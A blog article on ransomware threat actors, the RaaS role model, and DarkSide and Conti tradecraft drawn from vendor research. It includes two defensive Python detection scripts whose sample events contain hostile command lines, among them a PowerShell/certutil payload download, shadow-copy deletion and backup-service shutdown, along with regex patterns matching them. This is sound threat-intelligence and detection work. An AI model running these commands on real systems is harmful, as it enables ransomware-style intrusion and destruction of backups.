Destroy the Ransomware Threat: Part 1.2 — Know your enemy!

Alican Kiraz
11 min read · Jun 11, 2024
Via : https://images.app.goo.gl/zB3UarGszgb8gANE7

Hi, I decided to continue this unfinished series of articles alongside our YouTube videos to focus more on the technical aspects and delve into the details, as per your requests. In this series, I have gone very deep and decided to take my research to a new level by turning it into a book. Before publishing my book, I wanted to advance the article as a separate endeavor. You can find the continuation of this series in my book.

As you know, in the first part of our series on ransomware, we examined in detail how to detect, analyze, and prevent ransomware. Now, we will take a broader view of the topics. Specifically, we will explore who the Threat Actors (TAs) behind ransomware actually are and who is writing these programs.

First, when we hear the term ransomware or any malware, we often imagine a cyber attack group consisting of one or more, for example, a team of five or three people. However, this notion is far from reality. In fact, most ransomware is created and operated under the concept of ransomware as a service. Behind many ransomware attacks, there is a highly skilled group of malware creators and sophisticated Threat Actor (TA) groups who use this software. Most of the attacks are carried out by these TAs.

In this section, we will focus more on these attackers, their structures, and how they operate. We will review published research and articles. Our aim here is to understand ransomware groups, learn their movements, and analyze the logic of the attackers. Before understanding ransomware, we need to have a grasp of RaaS (Ransomware as a Service). The concept of RaaS involves providing ready-to-use ransomware tooling to individuals who will deploy ransomware or conduct any form of attack. Various ransomware groups develop their products with an ‘as a service’ structure to increase their profits and reduce their risk surface. The developed software is usually designed to be used by different attackers. The creation and use of such software involve many different teams. When examining the presence of these teams, many researchers have noticed that different teams are involved in different stages of an intrusion.

In a ransomware attack, there are various workgroups within the attack groups working in different roles. Northwave Cybersecurity categorizes these roles into seven positions and adds the following: ‘… Each role follows from the objective of the activities that are carried out within the attack. In the past, we would see each of these roles fulfilled by the same actor. However, in recent years, we have seen that more and more actors are specializing in a single role within this model.’ When these structures and forms are examined, they seem quite logical. Therefore, while identifying the attackers, we will base our understanding on Northwave Cybersecurity’s model.

Ransomware Affiliate

In this part, researchers observed that, when examining various initial access attempts and the tactics used in them, the lateral and vertical movements following the initial access were the same. They even found that although the ransomware family differed, the operational style of ransomware distribution was the same. This significantly increased the likelihood that the threat actor behind these different ransomware families was the same group. According to Northwave, this indicates that most major ransomware producers are currently using the ‘Ransomware as a Service’ model. This shared tradecraft across different ransomware families is what characterizes the ransomware affiliate role.

Data Manager

This team is responsible for data exfiltration. In their research, Northwave’s team of researchers discovered that TAs (Threat Actors) using RaaS (Ransomware as a Service) were exfiltrating data while advancing within the network. Therefore, they have assigned data exfiltration activities to a different team and role.

Ransomware Operator

According to Northwave researchers, the use of RaaS facilitates the ransomware business model, with certain individuals within the TA (Threat Actor) assuming the role of ransomware operator responsible for tasks such as ransomware development and infrastructure hosting.

Negotiator

Northwave researchers found that when communicating with TAs (Threat Actors) using ransomware, the person they spoke to often did not have extensive technical knowledge. It seemed they were not well-versed in operations either. In fact, when making price offers, these intermediaries sometimes asked for permission to consult their superiors. Additionally, during a second conversation, they sometimes encountered different individuals, and the new intermediary was not aware of the previous discussions. This led them to attribute significance to this role.

Chaser

The individuals in this role were observed to continually pressure the victim and the victim’s employees, threatening to leak their data. Northwave researchers noted that these threats followed specific scenarios. They even discovered that sometimes these individuals were unaware of whether negotiations were still ongoing. This led them to believe that this role was operated by a different actor.

Accountant

This role pertains to the laundering, mixing, and sometimes managing of the obtained revenue.

You must read this fantastic article series.

Via : https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin

When we look at ransomware groups, there are active ones whose members have not yet been arrested. Some of these include DarkSide, BlackMatter, Conti, Ryuk, NetWalker, Dharma, Sodinokibi (REvil), DoppelPaymer, Pysa (Mespinoza), Avaddon, CL0P, BABUK LOCKER, Nefilim, RagnarLocker, Lockbit, HelloKitty, OnePercent, and Diavol. Let’s examine these groups.

DarkSide

DarkSide ransomware is notorious for its highly destructive attacks that have impacted many companies listed on the NASDAQ. In its attack on Colonial Pipeline, which forced the company to shut down its OT network for two days, it managed to cut off a significant portion of gasoline supply in the eastern United States.

While researching DarkSide ransomware, I came across the article ‘A defender’s view inside a DarkSide ransomware attack’ written by the Sophos Rapid Response team, who have frequently encountered this malware. The article contains great information about DarkSide. I highly recommend you check it out. In this part of our series about DarkSide, we will be utilizing insights from this Sophos article.

The tools most commonly used by TAs (Threat Actors) in the RaaS (Ransomware as a Service) operations of DarkSide Ransomware are as follows.

Via : https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/

According to the Sophos team, DarkSide operates in the same style as double extortion ransomware operators like Maze and LockBit. It steals the victims’ data before encrypting it, threatening to release the information publicly if the victims do not pay for the decryption key. In their ransomware campaigns, as mentioned above, they again follow a single style, showing similar behaviors typical of an actor utilizing RaaS. They observed that initial access, regardless of the specific actor involved, was gained through phishing and the use of stolen credentials.

What sets DarkSide apart is that it also operates on Linux. According to Sophos researchers, DarkSide TAs (Threat Actors) do not act as quickly as those in other ransomware campaigns. They conduct reconnaissance operations that last weeks or even months.

Sophos researchers found that DarkSide TAs (Threat Actors) continuously exfiltrated data during their time inside the network. They uploaded the stolen files to Mega or pCloud.

Notes from Sophos researchers:

  • Before encrypting files, DarkSide adds a unique file extension to the name of each targeted document type.
  • It checks the administrative privileges of the user account it is working with, and if they are not present, it attempts to elevate its privileges using the CMSTP UAC bypass technique.
  • It retrieves the MAC address of the victim’s network adapter and then calculates the CRC32 of the first six bytes of the adapter’s MAC address five times; the initial seed is 0xDEADBEEF.
  • They also observed that the attackers terminated services related to Commvault and Veeam’s enterprise backup software, shut down MailEnable mail server software, and terminated SQL server database services to encrypt any databases they found.
  • Like other ransomware, it deletes Volume Shadow Copies.
  • Renaming the file with a new extension before encrypting it breaks the association between the document file type and the related application, giving the attacker the ability to make it appear as though everything has been encrypted.

The encryption process for DarkSide has always followed these steps:

Via : https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/

Researchers have found that DarkSide adds a black lock image file named with the same eight-character extension used to rename each targeted file to the %APPDATA%\Local directory. It then writes a Windows Registry key in HKEY_CLASSES_ROOT that associates files with this unique and specific file extension to the icon file, giving the encrypted files their own unique icon.
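The registry association described above is something an incident responder can hunt for. The script below is an added example (not code from the Sophos article or from any DarkSide sample): it parses a .reg-style export (the sample is constructed) and reports DefaultIcon entries under HKEY_CLASSES_ROOT whose icon file sits in a user profile directory, together with the extension(s) mapped to that ProgID. The exact key layout DarkSide writes is not given in the article; the standard ProgID/DefaultIcon layout used here is an assumption.

```python
"""Flag icon associations of the kind DarkSide plants in HKEY_CLASSES_ROOT.

Added example, not code from the Sophos article or from any DarkSide sample.
Legitimate file-type icons normally live in system DLLs; an extension whose
DefaultIcon points into a user's AppData directory is worth a closer look.
"""
import re

# Constructed sample export: one normal association (.txt) and one suspicious one.
SAMPLE_REG = r"""
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"

[HKEY_CLASSES_ROOT\txtfile\DefaultIcon]
@="%SystemRoot%\\system32\\imageres.dll,-102"

[HKEY_CLASSES_ROOT\.a1b2c3d4]
@="a1b2c3d4"

[HKEY_CLASSES_ROOT\a1b2c3d4\DefaultIcon]
@="C:\\Users\\alice\\AppData\\Local\\a1b2c3d4.ico"
"""

SECTION_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
DEFAULT_RE = re.compile(r'^@="(?P<val>.*)"$')
# Icon paths under a user profile, absolute or via the AppData environment variables.
USER_PROFILE_RE = re.compile(r"(\\Users\\[^\\]+\\AppData\\|%APPDATA%|%LOCALAPPDATA%)", re.IGNORECASE)


def parse_reg(text):
    """Return {key_path: default_value} for each section that sets an @ default value."""
    values = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        section = SECTION_RE.match(line)
        if section:
            current = section.group("key")
            continue
        default = DEFAULT_RE.match(line)
        if default and current is not None:
            # .reg files escape backslashes and double quotes; undo that.
            values[current] = default.group("val").replace("\\\\", "\\").replace('\\"', '"')
    return values


def find_suspicious_icons(values):
    """Return [(extension, progid, icon_path)] for HKCR DefaultIcon entries
    whose icon file lives inside a user profile directory."""
    # Map each ProgID to the extension keys that reference it.
    ext_by_progid = {}
    for key, val in values.items():
        parts = key.split("\\")
        if len(parts) == 2 and parts[0].upper() == "HKEY_CLASSES_ROOT" and parts[1].startswith("."):
            ext_by_progid.setdefault(val, []).append(parts[1])

    findings = []
    for key, val in values.items():
        parts = key.split("\\")
        if (len(parts) == 3 and parts[0].upper() == "HKEY_CLASSES_ROOT"
                and parts[2].lower() == "defaulticon" and USER_PROFILE_RE.search(val)):
            for ext in ext_by_progid.get(parts[1], ["<no extension mapped>"]):
                findings.append((ext, parts[1], val))
    return findings


if __name__ == "__main__":
    for ext, progid, icon in find_suspicious_icons(parse_reg(SAMPLE_REG)):
        print(f"suspicious association: {ext} -> {progid}, icon at {icon}")
```

On a live host the same check can be fed with the output of `reg export HKCR` from an affected machine; the hit itself (a short random-looking extension bound to an icon in AppData) also yields the extension to search for when scoping which files were renamed.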

Via : https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/

The ransom demand screen on the dark web appears as follows:

Via : https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/

You must read this excellent article about DarkSide.

Now, let’s also examine the excellent article recently written by the Cybereason Nocturnus Team, titled ‘Cybereason vs. DarkSide Ransomware.’

The Cybereason Nocturnus team also focuses on the double extortion strategy initially. This technique ensures that even if the victim company restores its data from offline backups, it still faces the threat of data leakage. The team notes that before the ransomware spreads, the attackers conduct a full-scale, sophisticated attack operation and deeply infiltrate the organization, specifically targeting the Domain Controller (DC). They mention that the group avoids attacking government institutions and carefully selects their targets, which consist of high-value private companies. They also state that a portion of the money they obtain is donated to charities and provide documentation to support this claim.

Via : https://www.cybereason.com/blog/research/cybereason-vs-darkside-ransomware

Now, let’s look at what a TA (Threat Actor) using DarkSide does to gain initial access to an organization and assess its attack potential, according to Cybereason’s analysis.

  • The attackers use PowerShell with the ‘DownloadFile’ command to download the malicious file as ‘update.exe’, abusing Certutil.exe and Bitsadmin.exe in the process. Below, we can review the flowchart prepared by the Cybereason team.
Via : https://www.cybereason.com/blog/research/cybereason-vs-darkside-ransomware

After downloading the file to the Windows folder, the attackers create a shared folder on the victim machine and use it to download a copy of the malware. According to Cybereason analysts, the attacker then starts lateral movements to reach the Domain Controller (DC) using the corporate network. Once the attacker reaches the DC, they ensure the extraction of sensitive information and the SAM hive. Subsequently, they use PowerShell on the infected computer to pull the malware onto the PC. To achieve double extortion, after exfiltrating all data, they distribute the file from the shared folder on the DC to other assets using bitsadmin.exe to maximize damage.
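The two groups of behaviours described on this page, the service and shadow-copy shutdown noted by Sophos and the living-off-the-land download and share-based distribution described by Cybereason, can be turned into a simple detection over process-creation telemetry. The following is an added example, not code from either vendor: it runs a few rules over Sysmon event 1 / Windows 4688 style records (all events are constructed samples, and 203.0.113.5 is a documentation address) and reports hosts that show at least two distinct behaviours, since any single one can be benign on its own.

```python
"""Triage process-creation events for DarkSide-style pre-encryption activity.

Added example, not code from the Sophos or Cybereason write-ups. Rules cover:
living-off-the-land downloads (PowerShell DownloadFile, certutil, bitsadmin),
SMB share creation on the staging host, stopping backup/mail/database services,
and shadow-copy deletion. Events below are constructed samples.
"""
import re
from collections import defaultdict

SAMPLE_EVENTS = [
    # WS-042: payload staged via PowerShell and certutil, then shared out.
    {"host": "WS-042", "user": "CORP\\alice",
     "cmd": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://203.0.113.5/update.exe','C:\\Windows\\update.exe')\""},
    {"host": "WS-042", "user": "CORP\\alice",
     "cmd": "certutil.exe -urlcache -split -f http://203.0.113.5/update.exe C:\\Windows\\update.exe"},
    {"host": "WS-042", "user": "CORP\\alice",
     "cmd": "net share staging=C:\\Windows"},
    # DC-01: backup and database services stopped, shadow copies removed, payload pulled.
    {"host": "DC-01", "user": "CORP\\Administrator", "cmd": "net stop VeeamBackupSvc /y"},
    {"host": "DC-01", "user": "CORP\\Administrator", "cmd": "net stop MSSQLSERVER /y"},
    {"host": "DC-01", "user": "CORP\\Administrator", "cmd": "vssadmin delete shadows /all /quiet"},
    {"host": "DC-01", "user": "CORP\\Administrator",
     "cmd": "bitsadmin /transfer job /download \\\\WS-042\\staging\\update.exe C:\\Windows\\update.exe"},
    # FS-01: a lone shadow-copy deletion, e.g. from a backup job; stays below the threshold.
    {"host": "FS-01", "user": "CORP\\svc_backup", "cmd": "vssadmin delete shadows /for=D: /oldest"},
    # WS-017: ordinary admin noise that must not fire.
    {"host": "WS-017", "user": "CORP\\bob", "cmd": "net stop Spooler"},
    {"host": "WS-017", "user": "CORP\\bob", "cmd": "bitsadmin /list /allusers"},
]

RULES = {
    "lolbin_download": re.compile(
        r"(DownloadFile|DownloadString|certutil(\.exe)?.*-urlcache|bitsadmin(\.exe)?\s+/transfer)", re.I),
    "share_creation": re.compile(r"\bnet1?(\.exe)?\s+share\s+\S+=", re.I),
    # Service names observed in the Sophos write-up: Commvault, Veeam, MailEnable, SQL Server.
    "backup_service_stop": re.compile(
        r"\b(net1?(\.exe)?|sc(\.exe)?)\s+stop\s+\"?\S*?(veeam|commvault|mailenable|mssql|sqlserver)", re.I),
    "shadow_copy_deletion": re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
}


def match_event(event):
    """Return the set of rule names whose pattern matches the event's command line."""
    return {name for name, pattern in RULES.items() if pattern.search(event["cmd"])}


def triage(events, min_distinct=2):
    """Collect rule hits per host and return {host: sorted_rule_names} for hosts
    showing at least `min_distinct` different behaviours."""
    per_host = defaultdict(set)
    for event in events:
        hits = match_event(event)
        if hits:
            per_host[event["host"]] |= hits
    return {host: sorted(tags) for host, tags in per_host.items() if len(tags) >= min_distinct}


if __name__ == "__main__":
    for host, tags in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(tags)}")
```

The threshold matters more than any single pattern: shadow-copy maintenance and service restarts are routine on backup and database servers, but a host that stops backup services, deletes shadow copies and pulls a binary over BITS within the same window matches the sequence both vendor reports describe.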

Via: https://www.cybereason.com/blog/research/cybereason-vs-darkside-ransomware

You can also access the malware analysis of the DarkSide malware conducted by the Cybereason team in the same article. Below, you can review the MITRE ATT&CK Mapping prepared by the team:

Via : https://www.cybereason.com/blog/research/cybereason-vs-darkside-ransomware

Additionally, you can review the infection routine map from the malware analysis shared by the Trend Micro team below, and you can examine the details via the link provided:

Via : https://success.trendmicro.com/dcx/s/solution/000286466?language=en_US&sfd

Conti Ransomware

When I reviewed the research and malware analysis articles on Conti malware, I found Jovi Umawing’s article from Malwarebytes Labs particularly interesting.

Jovi’s article begins by describing the incident where Ireland’s publicly funded health system, the Health Service Executive (HSE), fell victim to a Conti ransomware attack, which occurred a week after DarkSide’s attack on the Colonial Pipeline systems in the US. The attack affected 80,000 endpoints. Moreover, HSE was not Conti’s only healthcare target. In the USA, over 290 healthcare and first responder organizations were targeted in total. It seems they operate with an ethic and mindset completely opposite to that of DarkSide.

In the continuation of the article, it is mentioned that this malware was created and distributed by a group called Wizard Spider, the same Russian TA responsible for the infamous Ryuk. It is also offered to affiliated TAs as RaaS (Ransomware as a Service). The initial points of contact for this malware to reach a corporate network are remote desktop protocol (RDP), phishing attacks, and vulnerabilities. Jovi also notes that in their phishing campaigns, the group famously uses Google Doc URLs, which facilitate the download and execution of Bazar or IcedID. The associated TA uses tools like RDP, PsExec, and Cobalt Strike. According to CrowdStrike, files are encrypted using a combination of AES-256 and RSA-4096 through Microsoft CryptoAPI.

The fate of the group began to decline with the onset of the Russia-Ukraine war, when they declared their support for Russia. From an account called ‘ContiLeaks’ on X (formerly Twitter), chats and files from the secret and encrypted XMPP servers of the Conti and Ryuk ransomware gang were leaked. In the latest article published by Heimdal Security about the group, it is suggested that this leak was carried out by a gang of Ukrainian origin. You can access this excellent article below:

The contents of the leaked messages and files are as follows:

  • chat messages
  • salary structures
  • the threat group’s day to day activities
  • the group’s structure
  • bitcoin addresses
  • law enforcement evading methods
  • the BazarBackdoor API
  • photos of storage servers
Via : https://www.bleepingcomputer.com/news/security/conti-ransomwares-internal-chats-leaked-after-siding-with-russia/

After a major attack targeting the Costa Rican government, Conti shut down its website and ceased its operations. Here, there is a part that truly demonstrates how different ransomware operations are from other cyber attacks.

Unlike APT groups, cyber terrorism, or activism groups, advanced ransomware groups, even if they are disbanded, caught, or exposed and leaked, still have a product that can be sold, stolen, or modified and brought back into operation. This is because the development effort leaves behind a durable software asset whose quality reflects the professionalism of the organization that built it. This is the main starting point of the RaaS (Ransomware as a Service) service model. When developing a product, you may need many people. During development, these individuals can be replaced by new ones or excluded from the operation. However, once the development is complete and a ready-to-use inventory is available, far fewer but more competent personnel are needed than during development, depending on the complexity and usability of the inventory. This is why the RaaS model, new ransomware groups, and the rebranding of existing ransomware all keep emerging.

This is what happened with Conti. Heimdal Security mentions that the products and perhaps the work experiences left behind by Conti have spread to other threat groups like BlackCat, Hive, Bazarcall Collective, or Karakurt.

I hope you enjoyed my article. I will soon be publishing my subsequent research and compilations in a book. I will offer the book for free. Have a great day, everyone.


Alican Kiraz

Head of Cyber Defense Center | CSIE | CSAE | CCISO | CASP+ | OSCP | eCIR | CPENT | eWPTXv2 | eCDFP | eCTHPv2 | OSWP | CEH Master | Pentest+ | CySA+ and more...